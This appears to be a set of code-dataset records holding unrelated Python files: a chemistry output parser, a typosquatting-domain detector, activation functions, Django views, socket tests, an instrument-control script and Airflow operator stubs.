[(] 1[)] \\S\" + LPatoms[m]) \r\n r2 = re.compile(\".*LP [(] 2[)] \\S\" + LPatoms[m]) \r\n r3 = re.compile(\".*LP [(] 3[)] \\S\" + LPatoms[m])\r\n \r\n LP_occ_energy.append(list(filter(r1.match, NBOsummary))) \r\n LP_occ_energy.append(list(filter(r2.match, NBOsummary))) \r\n LP_occ_energy.append(list(filter(r3.match, NBOsummary)))\r\n#For empty sublists 'nan','nan is returned, for list containing the whole line the occupancy [41:48] and energy [52:60] is returned by selecting the appropriate characters in the line. \r\n for entry in LP_occ_energy:\r\n if entry == []:\r\n allNBO.append('nan')\r\n allNBO.append('nan')\r\n else:\r\n allNBO.append([string[41:48] for string in entry][0])\r\n allNBO.append([string[52:60] for string in entry][0])\r\n \r\n#Extraction of the bonds following the same principle as the lone pairs. 
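The lone-pair extraction above compiles one regex per orbital/atom pair, runs filter(pattern.match, lines) over the NBO summary, and then slices fixed character columns ([41:48], [52:60]) for occupancy and energy. A compact illustration of the filter idiom on fake summary lines; the layout is simplified (and tokens are pulled with split() rather than fixed slices), not the exact Gaussian column format:

# Simplified illustration of the regex-filter idiom used on the NBO summary.
import re

lines = [
    "     1. LP ( 1) O   1        1.99750   -0.51234",
    "     2. BD ( 1) C   2 - O  1 1.99900   -0.80111",
]

atom = "O   1"
pattern = re.compile(r".*LP \( 1\) " + re.escape(atom))
hits = list(filter(pattern.match, lines))
if hits:
    print(hits[0].split()[-2:])   # ['1.99750', '-0.51234']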
\r\n bonds_occ_energy = []\r\n atomcombinations = list(i.combinations(list(dfAtomLabels.iloc[files]), 2))\r\n atomcombinations = [list(x) for x in atomcombinations]\r\n for x in atomcombinations:\r\n x = x.sort()\r\n for n in range(len(atomcombinations)):\r\n for m in range(len(atomcombinations[n])):\r\n atomcombinations[n][m]= str(atomcombinations[n][m])\r\n atomcombinations[n][m]= atomcombinations[n][m].rjust(4)\r\n \r\n a1 = atomcombinations[n][0]\r\n a2 = atomcombinations[n][1]\r\n \r\n r1 = re.compile(\".*BD [(] 1[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r2 = re.compile(\".*BD [(] 2[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r3 = re.compile(\".*BD [(] 3[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r4 = re.compile(\".*BD[*][(] 1[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r5 = re.compile(\".*BD[*][(] 2[)] \\S\" + a1 + \" - \\S\" + a2) \r\n r6 = re.compile(\".*BD[*][(] 3[)] \\S\" + a1 + \" - \\S\" + a2)\r\n \r\n bonds_occ_energy.append(list(filter(r1.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r2.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r3.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r4.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r5.match, NBOsummary))) \r\n bonds_occ_energy.append(list(filter(r6.match, NBOsummary)))\r\n \r\n for entry in bonds_occ_energy:\r\n if entry == []:\r\n allNBO.append('nan')\r\n allNBO.append('nan')\r\n else:\r\n allNBO.append([string[41:48] for string in entry][0])\r\n allNBO.append([string[52:60] for string in entry][0])\r\n \r\n allNBOforallfiles.append(allNBO)\r\n \r\n#Writes a excel output wiht appropriate titles and drops all the columns with no entries. \r\npd.DataFrame(allNBOforallfiles, columns = allNBOtitle, index = dfAtomLabels.index).to_excel('NBO analysis.xlsx')\r\noutputdf = pd.read_excel('NBO analysis.xlsx').dropna(how='all', axis = 1)\r\noutputdf.to_excel('NBO analysis.xlsx')\r\n","sub_path":"descriptors-qm-geom-properties/get_nbo_analysis.py","file_name":"get_nbo_analysis.py","file_ext":"py","file_size_in_byte":7583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"21005701","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'ketian'\n__version__ = '1.04b'\n__email__ = 'ririhedou@gmail.com'\n\nimport sys,re\nfrom os import path\nimport pickle\nimport editdistance\n\n#import pylev\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nEDIT_DISTANCE_THRESHOLD = 2\nHYPHEN_DISTANCE_THRESHOLD = 4\nDOMAIN_LENGTH_THRESHOLD = 20\n\n\ncandidates =[u'facebook', u'youtube', u'paypal', u'bankofamerica.com', u'chase', u'wellsfargo', u'citi' ]\n\nFUZZER_CATEGORY = ['typo-squatting','homo-squatting','bits-squatting','combo-squatting', 'various']\n\nDIR = path.abspath(path.dirname(sys.argv[0]))\nDIR_DB = 'database'\nFILE_TLD = path.join(DIR, DIR_DB, 'effective_tld_names.dat')\nDB_TLD = path.exists(FILE_TLD)\n\n\ndef __domain_tld(domain):\n domain = domain.rsplit('.', 2)\n\n if len(domain) == 2:\n return domain[0], domain[1]\n\n if DB_TLD:\n cc_tld = {}\n re_tld = re.compile('^[a-z]{2,4}\\.[a-z]{2}$', re.IGNORECASE)\n\n for line in open(FILE_TLD):\n line = line[:-1]\n if re_tld.match(line):\n sld, tld = line.split('.')\n if not tld in cc_tld:\n cc_tld[tld] = []\n cc_tld[tld].append(sld)\n\n sld_tld = cc_tld.get(domain[2])\n if sld_tld:\n if domain[1] in sld_tld:\n return domain[0], domain[1] + '.' + domain[2]\n\n return domain[0] + '.' 
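The __domain_tld helper in this record leans on str.rsplit with maxsplit 2 and then folds country-code second-level domains back into the TLD when they appear in the effective-TLD list. The rsplit behavior that drives the three-way branch:

# rsplit behavior behind __domain_tld's three-way split.
print("facebook.com".rsplit(".", 2))        # ['facebook', 'com'] -> two-label fast path
print("login.facebook.com".rsplit(".", 2))  # ['login', 'facebook', 'com']
print("shop.example.co.uk".rsplit(".", 2))  # ['shop.example', 'co', 'uk'] -> cc-TLD folding case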
+ domain[1], domain[2]\n\ndef compare_with_a_base_domain(input_domain_tld,base_domain,original_domain):\n\n #print (input_domain)\n try:\n t1 = small_edit_distance(input_domain_tld,base_domain)\n t2 = direct_contain_basename_with_larger_distance(input_domain_tld,base_domain)\n t3 = long_hyphens_identify(input_domain_tld,base_domain)\n\n if t1 or t2 or t3:\n print (original_domain)\n f = open(base_domain + '.log', 'a')\n f.write(original_domain)\n f.write('\\n')\n f.flush()\n f.close()\n\n except:\n f = open('log-error.log','a')\n f.write(input_domain_tld)\n f.write('\\n')\n f.flush()\n f.close()\n\n\ndef long_hyphens_identify(input_domain, base_domain):\n # long hyphens\n domain, tld = __domain_tld(input_domain)\n def count_continous_hypens(domain):\n count = 0\n for i in domain:\n if i == u'-':\n count += 1\n if count > HYPHEN_DISTANCE_THRESHOLD:\n return True\n else:\n count = 0\n if count > HYPHEN_DISTANCE_THRESHOLD:\n return True\n return False\n\n if count_continous_hypens(domain):\n return True\n\n return False\n\n\ndef direct_contain_basename_with_larger_distance(input_domain, base_domain):\n\n # contain the keyword of the basename\n domain, tld = __domain_tld(input_domain)\n if base_domain in domain:\n distance = editdistance.eval(domain, base_domain)\n if distance > EDIT_DISTANCE_THRESHOLD:\n return True\n\n return False\n\ndef small_edit_distance(input_domain, base_domain):\n\n # a small edit-distance\n domain, tld = __domain_tld(input_domain)\n distance = editdistance.eval(domain, base_domain)\n if distance <= EDIT_DISTANCE_THRESHOLD:\n return True\n\n return False\n\ndef long_domain_name(inputdomain):\n\n if len(inputdomain) > DOMAIN_LENGTH_THRESHOLD:\n return True\n\n return False\n\n\ndef loadfrompickle(filename=\"obj.pickle\"):\n with open(filename, 'rb') as handle:\n b = pickle.load(handle)\n print (\"done the loading\")\n return b\n\ndef test(pickle):\n print ('Loading........')\n domainSets = loadfrompickle(pickle)\n\n print (type(domainSets))\n for i in domainSets:\n i = i.decode(\"idna\")\n compare_with_a_base_domain(i,u'facebook')\n\n\nif __name__ == \"__main__\":\n\n #test(\"../pickleFile/дети.pickle\")\n #test(\"../pickleFile/ru.pickle\")\n #test(\"../pickleFile/рф.pickle\")\n\n #print (u'facebook' in u'facebook------------------------')\n #print (editdistance.eval(u'facebook',u'facebook------------------------'))\n domain = 'xn--pfarmer-t2a.com'.decode(\"idna\")\n #domain = 'fabooke'.decode('utf-8')\n print (domain)\n #domain = 'facebook'.decode(\"idna\")\n #print domain\n\n print (__domain_tld(\"loging.facebook.----------sub-------------.malicious-domain.com\"))\n print (__domain_tld(\"loging.facebook.----------sub-------------.facebook.com.cn\"))\n #print (count_continous_hypens(domain))\n print (editdistance.eval(domain,u'pfarmer.com'))","sub_path":"code/squatting_detect.py","file_name":"squatting_detect.py","file_ext":"py","file_size_in_byte":4524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"587181149","text":"\"\"\"Module for memory handling, contains memory implementations,\nmemory handling, and other functions as detailed in the class\"\"\"\nclass Memory_Handler:\n\tdef __init__(self):\n\t\t#counter for constant memory\n\t\tself._constant_memory = [0,0,0,0]\n\t\t#counter for variable memory\n\t\tself._variable_memory = [0,0,0,0]\n\n\t#Get memory address of variable\n\tdef _get_memory_address_variable(self, variable_type = None):\n\t\t#variable_type should have value\n\t\tif variable_type is not 
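The three detectors above reduce to simple predicates on the second-level label: small Levenshtein distance, the base name embedded with extra edits, and long hyphen runs. A condensed standalone sketch of the distance check using a tiny pure-Python Levenshtein, so it runs without the editdistance package; exact matches are excluded here for readability, whereas the record's small_edit_distance also flags distance zero:

# Pure-Python Levenshtein so the distance check runs without editdistance.
def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

EDIT_DISTANCE_THRESHOLD = 2
for candidate in ["facebook", "faceb00k", "fecebook", "fakebook-login"]:
    d = levenshtein(candidate, "facebook")
    print(candidate, d, "suspicious" if 0 < d <= EDIT_DISTANCE_THRESHOLD else "")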
None:\n\t\t\t#memory address for whole\n\t\t\tif(variable_type == \"whole\"):\n\t\t\t\taddress = (200+self._variable_memory[0])\n\t\t\t\tself._variable_memory[0] = self._variable_memory[0]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for decimal\n\t\t\telif(variable_type == \"decimal\"):\n\t\t\t\taddress = (300+self._variable_memory[1])\n\t\t\t\tself._variable_memory[1] = self._variable_memory[1]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for words\n\t\t\telif(variable_type == \"words\"):\n\t\t\t\taddress = (400+self._variable_memory[2])\n\t\t\t\tself._variable_memory[2] = self._variable_memory[2]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for boolean\n\t\t\telif(variable_type == \"boolean\"):\n\t\t\t\taddress = (500+self._variable_memory[3])\n\t\t\t\tself._variable_memory[3] = self._variable_memory[3]+1\n\t\t\t\treturn address\n\n\t\t\t#does not recognize variable type\n\t\t\telse:\n\t\t\t\treturn -1\n\n\t#Get memory address of constant\n\tdef _get_memory_address_constant(self, constant_type = None):\n\t\t#constant_type should have value\n\t\tif constant_type is not None:\n\t\t\t#memory address for constant whole\n\t\t\tif(constant_type == \"cst_whole\"):\n\t\t\t\taddress = (600+self._constant_memory[0])\n\t\t\t\tself._constant_memory[0] = self._constant_memory[0]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for constant decimal\n\t\t\telif(constant_type == \"cst_decimal\"):\n\t\t\t\taddress = (700+self._constant_memory[1])\n\t\t\t\tself._constant_memory[1] = self._constant_memory[1]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for constant words\n\t\t\telif(constant_type == \"cst_words\"):\n\t\t\t\taddress = (800+self._constant_memory[2])\n\t\t\t\tself._constant_memory[2] = self._constant_memory[2]+1\n\t\t\t\treturn address\n\n\t\t\t#memory address for constant boolean\n\t\t\telif(constant_type == \"cst_boolean\"):\n\t\t\t\taddress = (900+self._constant_memory[3])\n\t\t\t\tself._constant_memory[3] = self._constant_memory[3]+1\n\t\t\t\treturn address\n\n\t\t\t#does not recognize constant type\n\t\t\telse:\n\t\t\t\treturn -1","sub_path":"Delivery_5/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"601595189","text":"import math\n\n\ndef sigmoid_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(-60.0, min(60.0, s))\n return 1.0 / (1.0 + math.exp(-z))\n\n\ndef tanh_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(-60.0, min(60.0, s))\n return math.tanh(z)\n\n\ndef sin_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(-60.0, min(60.0, s))\n return math.sin(z)\n\n\ndef gauss_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(-60.0, min(60.0, s))\n return math.exp(-0.5 * z**2) / math.sqrt(2 * math.pi)\n\n\ndef relu_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s if s > 0.0 else 0\n\n\ndef identity_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s\n\n\ndef clamped_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return max(-1.0, min(1.0, s))\n\n\ndef inv_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n if s == 0:\n return 0.0\n\n return 1.0 / s\n\n\ndef 
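Every branch in the Memory_Handler record repeats the same base-address-plus-counter arithmetic, just with a different base (200/300/400/500 for variables, 600 through 900 for constants). A table-driven sketch that collapses the branches; the type names and bases mirror the record:

# Table-driven version of the base+counter address allocation above.
class MemoryHandler:
    BASES = {"whole": 200, "decimal": 300, "words": 400, "boolean": 500,
             "cst_whole": 600, "cst_decimal": 700, "cst_words": 800, "cst_boolean": 900}

    def __init__(self):
        self.counters = {key: 0 for key in self.BASES}

    def get_address(self, type_name):
        if type_name not in self.BASES:
            return -1                      # unknown type, as in the record
        address = self.BASES[type_name] + self.counters[type_name]
        self.counters[type_name] += 1
        return address

mh = MemoryHandler()
print(mh.get_address("whole"), mh.get_address("whole"), mh.get_address("cst_words"))
# 200 201 800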
log_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n z = max(1e-7, s)\n return math.log(z)\n\n\ndef exp_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n \n z = max(-60.0, min(60.0, s))\n return math.exp(z)\n\n\ndef abs_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return abs(s)\n\n\ndef hat_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return max(0.0, 1 - abs(s))\n\n\ndef square_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s ** 2\n\n\ndef cube_activation(bias, links, ivalues):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s ** 3\n\n\ndef maxout_activation(bias, links, ivalues):\n inputs = []\n for i, w in links:\n inputs.append(ivalues[i] * w) \n\n return max(inputs) \n\n\ndef elu(x):\n s = 0.0\n for i, w in links:\n s += ivalues[i] * w\n\n return s if s > 0 else math.exp(x) - 1\n\n\nclass InvalidActivationFunction(Exception):\n pass\n\n\nclass ActivationFunctionSet(object):\n def __init__(self):\n self.functions = {}\n\n def add(self, config_name, function):\n # TODO: Verify that the given function has the correct signature.\n self.functions[config_name] = function\n\n def get(self, config_name):\n f = self.functions.get(config_name)\n if f is None:\n raise InvalidActivationFunction(\"No such function: {0!r}\".format(config_name))\n\n return f\n\n def is_valid(self, config_name):\n return config_name in self.functions\n\n\n","sub_path":"neat/activations.py","file_name":"activations.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"142957382","text":"def text_writer(string1, string2):\n print(\"Writing {} - {}\".format(string1, string2))\n\n\nclass Invoker(object):\n def __init__(self):\n self.commands = []\n\n def add_command(self, command):\n self.commands.append(command)\n\n def run(self):\n for command in self.commands:\n command[\"function\"](*command[\"params\"])\n\n\nif __name__ == \"__main__\":\n invoker = Invoker()\n invoker.add_command({\n \"function\": text_writer,\n \"params\": (\"Command 1\", \"String 1\")\n })\n invoker.add_command({\n \"function\": text_writer,\n \"params\": (\"Command 2\", \"String 2\")\n })\n invoker.run()\n","sub_path":"design_patterns/Command/command_pattern_func.py","file_name":"command_pattern_func.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"200013871","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Diary, Comment\nfrom django.utils import timezone\nfrom .forms import DiaryForm, CommentForm\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n\n\ndef index(request):\n\n page=request.GET.get('page','1')\n\n diary_list = Diary.objects.order_by('-create_date')\n\n paginator=Paginator(diary_list, 10)\n page_obj=paginator.get_page(page)\n\n context = {'diary_list': page_obj}\n return render(request, 'todolist/diary_list.html', context)\n\n\ndef detail(request, diary_id):\n diary = get_object_or_404(Diary, pk=diary_id)\n context = {'diary': diary}\n return render(request, 'todolist/diary_detail.html', context)\n\n\ndef comment_create(request, diary_id):\n diary = get_object_or_404(Diary, pk=diary_id)\n\n if request.method == \"POST\":\n form = 
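All the activations above share one shape: accumulate sum(ivalues[i] * w) over the links, then apply a nonlinearity. Two stored quirks worth noting: the bias parameter is accepted but never used, and elu refers to links/ivalues that are not among its arguments, so it would raise NameError when called. A small runnable sketch of the registry-plus-dispatch pattern that ActivationFunctionSet implements:

# Registry/dispatch pattern used by ActivationFunctionSet above.
import math

def weighted_sum(links, ivalues):
    return sum(ivalues[i] * w for i, w in links)

def sigmoid(bias, links, ivalues):
    z = max(-60.0, min(60.0, weighted_sum(links, ivalues)))
    return 1.0 / (1.0 + math.exp(-z))

def relu(bias, links, ivalues):
    s = weighted_sum(links, ivalues)
    return s if s > 0.0 else 0.0

functions = {"sigmoid": sigmoid, "relu": relu}

links = [(0, 0.5), (1, -0.25)]      # (input index, weight) pairs
ivalues = {0: 1.0, 1: 2.0}          # node id -> activation value
print(functions["sigmoid"](0.0, links, ivalues))   # 0.5 (weighted sum is exactly 0)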
CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.create_date = timezone.now()\n comment.diary = diary\n comment.save()\n return redirect('todolist:detail', diary_id=diary.id)\n else:\n form = CommentForm()\n\n context = {'diary': diary, 'form': form}\n return render(request, 'todolist/diary_detail.html', context)\n\n diary.comment_set.create(content=request.POST.get(\n 'content'), create_date=timezone.now())\n return redirect('todolist:detail', diary_id=diary.id)\n\n\ndef diary_create(request):\n\n if request.method == 'POST':\n form = DiaryForm(request.POST)\n if form.is_valid():\n diary = form.save(commit=False)\n diary.create_date = timezone.now()\n diary.save()\n return redirect('todolist:index')\n else:\n form = DiaryForm()\n\n context = {'form': form}\n return render(request, 'todolist/diary_form.html', context)\n","sub_path":"mysite1/todolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"301249003","text":"import unittest\nimport threading\nimport socket\nimport time\nfrom krpc.connection import Connection\n\nport = None\n\ndef server_thread(started):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind(('', 0))\n global port\n port = sock.getsockname()[1]\n sock.listen(1)\n time.sleep(1)\n started.set()\n\n while True:\n\n # Wait for a connection\n connection, client_address = sock.accept()\n\n # Client connected\n disconnect = False\n sock.settimeout(0.1)\n try:\n # Receive then resend data back to client\n while not disconnect:\n data = connection.recv(16)\n if data:\n if data.startswith(b'disconnect'):\n disconnect = True\n connection.sendall(data)\n else:\n break\n finally:\n connection.close()\n sock.settimeout(None)\n\nclass TestConnection(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls._started_server = threading.Event()\n server = threading.Thread(target=server_thread, args=(cls._started_server,))\n server.daemon = True\n server.start()\n cls._started_server.wait()\n\n def server_close_connection(self, conn):\n conn.send(b'disconnect')\n self.assertEqual(b'disconnect', conn.receive(10))\n # Wait for the connection to close\n while conn._socket.recv(1) != b'':\n pass\n\n def connect(self):\n conn = Connection('localhost', port)\n conn.connect()\n return conn\n\n def test_send_receive(self):\n conn = self.connect()\n conn.send(b'foo')\n self.assertEqual(b'foo', conn.receive(3))\n\n def test_long_send_receive(self):\n conn = self.connect()\n message = b'foo' * 4096\n conn.send(message)\n self.assertEqual(message, conn.receive(len(message)))\n\n def test_long_send_partial_receive(self):\n conn = self.connect()\n message = b'foo' * 4096\n conn.send(message)\n partial = conn.partial_receive(4096)\n self.assertEqual(message[:len(partial)], partial)\n self.assertEqual(message[len(partial):], conn.receive(len(message) - len(partial)))\n\n def test_receive_on_remote_closed_connection(self):\n conn = self.connect()\n self.server_close_connection(conn)\n self.assertRaises(socket.error, conn.receive, 1)\n\n def test_partial_receive_on_remote_closed_connection(self):\n conn = self.connect()\n self.server_close_connection(conn)\n self.assertEquals(b'', conn.partial_receive(1))\n\n def test_send_on_closed_connection(self):\n conn = self.connect()\n conn.close()\n self.assertRaises(socket.error, conn.send, b'foo')\n\n def test_receive_on_closed_connection(self):\n conn = 
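The index view in the Django record above pages the queryset with Paginator(diary_list, 10) and get_page, which clamps out-of-range or non-numeric page values instead of raising; note also that everything after the first return render(...) in comment_create is unreachable as stored. Paginator accepts any sliceable sequence, so the paging behavior can be seen without a database, assuming Django is installed:

# Paginator works on any sliceable sequence, not just querysets.
from django.core.paginator import Paginator

paginator = Paginator(range(1, 26), 10)       # 25 items, 10 per page
page = paginator.get_page("2")                # page numbers may arrive as strings
print(list(page))                             # [11, 12, ..., 20]
print(page.has_next(), page.has_previous())   # True True
print(paginator.num_pages)                    # 3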
self.connect()\n conn.close()\n self.assertRaises(socket.error, conn.receive, 1)\n\n def test_partial_receive_on_closed_connection(self):\n conn = self.connect()\n conn.close()\n self.assertRaises(socket.error, conn.partial_receive, 1)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"lib/python2.7/site-packages/krpc/test/test_connection.py","file_name":"test_connection.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"56120766","text":"import datetime\n\nfrom django import template\nfrom base import const\n\nfrom application.pytsm.utils.import_mod import _import_module\nfrom application.pytsm.utils.cfg_queries import get_servers, get_overview_queries, get_alarm_colors\nregister = template.Library()\n\nDEVICE_ALARM = \"\"\"\n{value} {unit}\n\"\"\"\n\nDEVICE_NORMAL = \"\"\"\n{value} {unit}\n\"\"\"\n\n@register.simple_tag\ndef overview_value(value, srv):\n\n servers = get_servers()\n server = servers[srv]\n\n overviews = get_overview_queries()\n\n tabelle_name = server.cfg_pytsm_server_tabelle(overview=True, cl=False)\n tabelle_class = server.cfg_pytsm_server_tabelle(overview=True, cl=True)\n\n db_module = _import_module(\"application.pytsm.models.{}\".format(tabelle_name))\n tabclass = getattr(db_module, tabelle_class)\n\n val = tabclass.objects.filter(name=value).first()\n\n\n if val != None:\n overview = overviews[value]\n\n if overview.cfg_pytsm_overview_unit == '#': # Only number value without sign\n res_unit = \"\"\n\n else:\n res_unit = overview.cfg_pytsm_overview_unit\n\n res = DEVICE_NORMAL.format(value=val.results, unit=res_unit) # Default erow\n\n if overview.cfg_pytsm_base_alert_val != None or overview.cfg_pytsm_base_alert_val != '--empty--' :\n # can we change to float\n try:\n result = float((val.results).replace(\",\",\".\"))\n compare = float((overview.cfg_pytsm_base_alert_val).replace(\",\",\".\"))\n except:\n # change to float is not possible (datetime)\n result = val.results\n compare = overview.cfg_pytsm_base_alert_val\n\n if overview.cfg_pytsm_base_alert_cmp == 'less':\n if result < compare:\n res = DEVICE_ALARM.format(fcolor=\"red\", bgcolor=\"yellow\", value=val.results, unit=res_unit)\n\n elif overview.cfg_pytsm_base_alert_cmp == 'notequal':\n if result != compare:\n res = DEVICE_ALARM.format(fcolor=\"red\", bgcolor=\"yellow\", value=val.results, unit=res_unit)\n\n elif overview.cfg_pytsm_base_alert_cmp == 'equal':\n if result == compare:\n res = DEVICE_ALARM.format(fcolor=\"red\", bgcolor=\"yellow\", value=val.results, unit=res_unit)\n\n elif overview.cfg_pytsm_base_alert_cmp == 'more':\n if result > compare:\n res = DEVICE_ALARM.format(fcolor=\"red\", bgcolor=\"yellow\", value=val.results, unit=res_unit)\n\n return res\n","sub_path":"application/pytsm/templatetags/pytsm_tags.py","file_name":"pytsm_tags.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"607544111","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 20 10:28:22 2017\n\n@author: denys\n\"\"\"\ndef writeAWG(signal, samplerateAWG, awg_volt):\n import visa\n import numpy as np\n import time\n \n \n # Connect to Instruments\n rm = visa.ResourceManager()\n rs = rm.list_resources()\n for i in range (0,len(rs)):\n pruf=rs[i]\n test=pruf.find(\"USB\")\n if test != -1:\n index=i\n awg_id = rs[index]\n AWG = rm.open_resource(awg_id)\n \n ##################################################\n 
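The krpc Connection tests above rely on receive(n) blocking until exactly n bytes arrive, versus partial_receive, which returns whatever a single recv yields. A generic sketch of the receive-exactly loop such a method typically wraps; this is an assumption about the usual shape of such code, not krpc's actual implementation:

# Typical receive-exactly loop; assumed shape, not krpc's internals.
import socket

def recv_exactly(sock, n):
    """Block until exactly n bytes are read, or raise if the peer closes."""
    chunks = []
    remaining = n
    while remaining > 0:
        data = sock.recv(remaining)
        if not data:                       # peer closed the connection
            raise socket.error("connection closed with %d bytes pending" % remaining)
        chunks.append(data)
        remaining -= len(data)
    return b"".join(chunks)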
################## Write to AWG ##################\n ##################################################\n \n AWG.write(\"*RST\") \n #time.sleep(5)\n AWG.write(\"DATA:VOLatile:CLEar\")\n #time.sleep(5)\n myrange=max(abs(max(signal)),abs(min(signal)))\n #Data Conversion from V to DAC levels\n data_conv = np.round(signal*32766/myrange); \n data_conv = \",\".join(str(e) for e in data_conv)\n AWG.write(\"SOURce1:DATA:ARBitrary:DAC myarb ,\" + data_conv)\n time.sleep(10)\n AWG.write(\"SOURce1:FUNCtion:ARBitrary 'myarb'\")\n time.sleep(10)\n AWG.write(\"SOURce1:FUNCtion ARB\") #USER\n AWG.write(\"DISPlay:FOCus CH1\")\n AWG.write(\"DISPlay:UNIT:ARBRate FREQuency\")\n AWG.write(\"SOURce1:FUNCtion:ARBitrary:SRATe \" + str(samplerateAWG))\n AWG.write(\"SOURce2:DATA:ARBitrary:DAC myarb ,\" + data_conv)\n AWG.write(\"SOURce2:FUNCtion:ARBitrary 'myarb'\")\n time.sleep(10)\n AWG.write(\"SOURce2:FUNCtion ARB\") #USER\n AWG.write(\"DISPlay:FOCus CH2\")\n AWG.write(\"DISPlay:UNIT:ARBRate FREQuency\")\n AWG.write(\"SOURce2:FUNCtion:ARBitrary:SRATe \" + str(samplerateAWG))\n AWG.write(\"FUNC:ARB:SYNC\")\n AWG.write(\"SOURce1:VOLTage \" + str(awg_volt)) \n AWG.write(\"SOURce2:VOLTage \" + str(awg_volt))\n time.sleep(5)\n AWG.write(\"OUTPut1 ON\")\n AWG.write(\"OUTPut2 ON\")\n AWG.write(\"DISPlay:FOCus CH1\")\n \n return (signal, samplerateAWG, awg_volt)","sub_path":"Resources/Original_von_Jens_Literatur_Projektseminar_Python/Material_Denys/Nichtlinear_18042018/writeAWG.py","file_name":"writeAWG.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"487895772","text":"from airflow.utils.decorators import apply_defaults\nfrom airflow.contrib.operators.qubole_operator import QuboleOperator\nfrom airflow.contrib.hooks.qubole_hook import QuboleHook\nfrom cStringIO import StringIO\n\nfrom operators.mojave_pseudo_operator import MojavePseudoOperator\nfrom util.utils import xcom_result\n\n\nclass DemoPythonOperator(MojavePseudoOperator):\n def __init__(self, id=None, **kwargs):\n super(DemoPythonOperator, self).__init__(id, **kwargs)\n self.run = kwargs.get('run')\n\n def call(self, dag):\n if not self.config_task:\n raise Exception(\"Config is must\")\n\n t = PythonOperator(\n task_id=self.id,\n python_callable=self.run,\n provide_context=True,\n templates_dict={\n\n },\n dag=dag\n )\n # The real operator is the PythonOperator\n self.task = t\n return t\n\n def default_format_function(self, record, var=None, config=None):\n return record\n\n @abc.abstractmethod\n def run(self, **context):\n raise NotImplementedError(\n \"The 'run' method of the '{}' MySqlOperator was not implemented\".format(self.id))\n return\n\n @abc.abstractmethod\n def get_results(self):\n raise NotImplementedError(\n \"The 'run' method of the '{}' MySqlOperator was not implemented\".format(self.id))\n return\n\n\nclass DemoQuboleOperator(MojavePseudoOperator):\n def __init__(self, id=None, **kwargs):\n super(DemoQuboleOperator, self).__init__(id, **kwargs)\n self.run = kwargs.get('run')\n\n def call(self, dag):\n if not self.config_task:\n raise Exception(\"Config is must\")\n\n t = PythonOperator(\n task_id=self.id,\n python_callable=self.run,\n provide_context=True,\n templates_dict={\n\n },\n dag=dag\n )\n # The real operator is the PythonOperator\n self.task = t\n return t\n\n\n def default_format_function(self, record, var=None, config=None):\n return record\n\n @abc.abstractmethod\n def run(self, **context):\n raise NotImplementedError(\n \"The 
